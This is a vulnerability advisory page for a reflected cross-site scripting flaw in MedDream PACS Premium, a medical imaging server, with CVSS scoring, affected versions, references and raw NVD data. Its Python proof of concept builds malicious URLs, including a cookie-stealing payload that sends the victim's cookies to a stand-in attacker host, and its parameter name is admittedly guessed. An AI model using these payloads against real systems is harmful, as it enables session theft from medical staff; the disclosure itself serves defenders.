Security Vulnerability Report

CVE-2025-54814 (CVSS 6.1 MEDIUM)

Published: 2026-01-20 15:17:02
Last Modified: 2026-01-29 15:21:04

Description

A reflected cross-site scripting (XSS) vulnerability exists in the modifyAutopurgeFilter functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary JavaScript code execution in the victim's browser. An attacker can provide a crafted URL to trigger this vulnerability; the victim has to open that URL (UI:R), and no authentication is required under the reporter's scoring (PR:N).

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation)

Note: the 6.1 score is the reporter's (secondary) scoring. The primary NVD scoring in the raw JSON below assumes low privileges are required (PR:L) and yields a base score of 5.4 MEDIUM; the remaining metrics are identical.

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE

MedDream PACS Premium < 7.3.6.870
MedDream PACS Premium 7.3.6.870

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import urllib.parse

# CVE-2025-54814 PoC - Reflected XSS in MedDream PACS Premium modifyAutopurgeFilter
# Vulnerability: Reflected XSS in modifyAutopurgeFilter functionality
# Affected: MedDream PACS Premium 7.3.6.870
# CVSS: 6.1 (Medium)


def generate_xss_payload():
    """
    Generate XSS payload for CVE-2025-54814.
    This PoC demonstrates the reflected XSS vulnerability in modifyAutopurgeFilter.
    """
    # Basic XSS payload to demonstrate the vulnerability
    xss_payload = '<script>alert("XSS")</script>'
    # More advanced payload for cookie stealing
    cookie_stealer_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    return xss_payload, cookie_stealer_payload


def build_malicious_url(base_url, payload):
    """
    Build a malicious URL carrying the XSS payload.

    Args:
        base_url: Target MedDream PACS Premium URL
        payload: XSS payload to inject

    Returns:
        Malicious URL that triggers the XSS vulnerability
    """
    # URL-encode the payload
    encoded_payload = urllib.parse.quote(payload)
    # Construct the vulnerable URL.
    # Assumption of this PoC: modifyAutopurgeFilter is reached via a query
    # parameter such as 'filter' or 'autopurge' (parameter name not confirmed here).
    malicious_url = f"{base_url}/modifyAutopurgeFilter?filter={encoded_payload}"
    return malicious_url


def demonstrate_attack_scenario():
    """
    Demonstrate the attack scenario for CVE-2025-54814.
    """
    target = "https://vulnerable-meddream-server.com"
    basic_payload, advanced_payload = generate_xss_payload()

    print("=" * 60)
    print("CVE-2025-54814 - Reflected XSS in MedDream PACS Premium")
    print("=" * 60)
    print("\nTarget: MedDream PACS Premium 7.3.6.870")
    print("Vulnerability: Reflected XSS in modifyAutopurgeFilter")
    print("CVSS Score: 6.1 (Medium)")
    print("Attack Vector: Network (AV:N), No Authentication Required (PR:N)")
    print("User Interaction Required: Yes (UI:R)")

    print("\n[+] Basic XSS Payload:")
    basic_url = build_malicious_url(target, basic_payload)
    print(f"    {basic_url}")

    print("\n[+] Advanced Cookie Stealing Payload:")
    advanced_url = build_malicious_url(target, advanced_payload)
    print(f"    {advanced_url}")

    print("\n[!] Attack Steps:")
    print("    1. Attacker crafts malicious URL with XSS payload")
    print("    2. Attacker tricks victim into clicking the link (social engineering)")
    print("    3. Victim's browser sends request to vulnerable server")
    print("    4. Server reflects unsanitized input in response")
    print("    5. Victim's browser executes malicious JavaScript")
    print("    6. Attacker steals cookies/sessions or performs actions on behalf of victim")

    return basic_url, advanced_url


if __name__ == "__main__":
    demonstrate_attack_scenario()
```

References

https://talosintelligence.com/vulnerability_reports/TALOS-2025-2261 (Exploit, Third Party Advisory)
https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2261 (Exploit, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-54814",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T15:17:02.193",
    "lastModified": "2026-01-29T15:21:04.460",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A reflected cross-site scripting (xss) vulnerability exists in the modifyAutopurgeFilter functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability."
      },
      {
        "lang": "es",
        "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejado existe en la funcionalidad modifyAutopurgeFilter de MedDream PACS Premium 7.3.6.870. Una URL maliciosa especialmente diseñada puede conducir a la ejecución arbitraria de código javascript. Un atacante puede proporcionar una URL diseñada para activar esta vulnerabilidad."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*",
                "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2261",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2261",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```